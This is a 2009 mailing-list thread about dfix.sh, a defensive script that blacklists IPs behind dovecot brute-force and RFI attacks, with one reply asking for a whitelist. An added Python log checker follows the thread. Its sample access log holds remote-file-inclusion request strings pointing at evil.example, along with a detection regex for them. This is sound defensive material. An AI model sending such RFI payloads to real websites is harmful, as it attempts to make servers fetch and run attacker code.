
Date:  Mon, 19 Jan 2009 08:45:12 -0800
From:  "Jim Scott" <jscott (at mark) infoconex.com>
Subject:  [coba-e:14802] Re: dfix.sh Update
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <60C8DB9EA0A04AD98A1DABB21C8CB88E (at mark) concord.corp>
References:  <49746973.3060002 (at mark) theanchoragesylvania.com>
X-Mail-Count: 14802

Greg, it would be great if you could add to your script the ability to 
whitelist a set of IP addresses. For instance, I had to customize your script 
to get it to ignore a monitoring server.

Jim

----- Original Message ----- 
From: "Greg Kuhnert" <greg.kuhnert (at mark) theanchoragesylvania.com>
To: "BQ List" <coba-e (at mark) bluequartz.org>; "BlueOnyx General Mailing List" 
<blueonyx (at mark) blueonyx.it>
Sent: Monday, January 19, 2009 3:52 AM
Subject: [coba-e:14799] dfix.sh Update


> Hi Blue*
>
> After the recent dovecot update, I noticed a log format change to the 
> dovecot log files. Theoretically, the reason for running dfix is now gone. 
> The old system lockups when our servers are subjected to brute force 
> attacks to dovecot appear to be fixed with the current dovecot rpm.
>
> However, preventing system lockups is not the only reason to run dfix. 
> Brute force attacks are designed to find bad or weak passwords. dfix will 
> detect these attacks and temporarily black-list the attacker's IP address.
>
> Another new feature in the current version is the ability to detect http 
> rfi (Remote File Include) attackers. If you upgrade to this version of 
> dfix, you may be surprised just how many people are attempting to attack 
> your websites.
>
> An explanation of RFI exploits can be found at 
> http://en.wikipedia.org/wiki/Remote_File_Inclusion
>
> Anyway, the code for dfix is as always available at 
> http://www.gregkuhnert.com/public:bq:dfix
>
> I plan to release another update soon - to clean up the code... till then, 
> enjoy this version.
>
> Regards,
> Greg.
>
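Added illustration for this thread, not dfix's own code (which is not reproduced here): a small Python checker that counts dovecot authentication failures per source IP, flags HTTP requests whose query parameter points at a remote URL (the RFI pattern Greg mentions), and honours a whitelist of IPs or networks as Jim requests. The log lines are constructed, the dovecot "auth failed ... rip=" layout and Apache common-log layout are assumptions, and a monitoring host at 198.51.100.77 is included so the whitelist has something to do.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Constructed sample lines in an assumed dovecot-1.x style; the monitoring
# host 198.51.100.77 probes with a dummy account and would trip the threshold.
DOVECOT_LOG = """\
Jan 19 08:40:01 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=203.0.113.5, lip=198.51.100.1
Jan 19 08:40:02 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts): user=<root>, method=PLAIN, rip=203.0.113.5, lip=198.51.100.1
Jan 19 08:40:03 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts): user=<test>, method=PLAIN, rip=203.0.113.5, lip=198.51.100.1
Jan 19 08:40:04 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts): user=<probe>, method=PLAIN, rip=192.0.2.10, lip=198.51.100.1
Jan 19 08:40:05 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts): user=<monitor>, method=PLAIN, rip=198.51.100.77, lip=198.51.100.1
Jan 19 08:40:06 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts): user=<monitor>, method=PLAIN, rip=198.51.100.77, lip=198.51.100.1
Jan 19 08:40:07 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts): user=<monitor>, method=PLAIN, rip=198.51.100.77, lip=198.51.100.1
"""
# Constructed Apache common-log lines; two carry a remote URL in a query parameter.
ACCESS_LOG = """\
203.0.113.9 - - [19/Jan/2009:08:41:00 -0800] "GET /index.php?page=http://evil.example/x.txt? HTTP/1.1" 200 512
198.51.100.77 - - [19/Jan/2009:08:41:01 -0800] "GET /status.php HTTP/1.1" 200 12
203.0.113.9 - - [19/Jan/2009:08:41:02 -0800] "GET /index.php?page=ftp://evil.example/x.txt HTTP/1.1" 404 8
"""

AUTH_FAIL = re.compile(r"auth failed.*?rip=(\d+\.\d+\.\d+\.\d+)")   # failed login + remote IP
ACCESS = re.compile(r'^(\d+\.\d+\.\d+\.\d+) .*? "[A-Z]+ (\S+)')       # client IP + request path
RFI_PARAM = re.compile(r"[?&][^=&]+=(?:https?|ftp)://", re.I)        # param value is a remote URL

def offending_ips(dovecot_log, access_log, whitelist, threshold=3):
    """Return {ip: reason} for sources that reach `threshold` dovecot auth failures
    or send RFI-style requests; anything inside a whitelisted IP/network is skipped."""
    allowed = [ip_network(n, strict=False) for n in whitelist]
    def is_allowed(ip):
        return any(ip_address(ip) in net for net in allowed)
    fails = Counter()
    for line in dovecot_log.splitlines():
        m = AUTH_FAIL.search(line)
        if m:
            fails[m.group(1)] += 1
    hits = {}
    for ip, n in fails.items():
        if n >= threshold and not is_allowed(ip):
            hits[ip] = f"{n} dovecot auth failures"
    for line in access_log.splitlines():
        m = ACCESS.match(line)
        if m and RFI_PARAM.search(m.group(2)) and not is_allowed(m.group(1)):
            hits.setdefault(m.group(1), "RFI-style request")
    return hits

if __name__ == "__main__":
    print(offending_ips(DOVECOT_LOG, ACCESS_LOG, ["198.51.100.0/24"]))
```

Without the whitelist entry the monitoring host shows up alongside the real offenders, which is exactly the false positive Jim had to patch around.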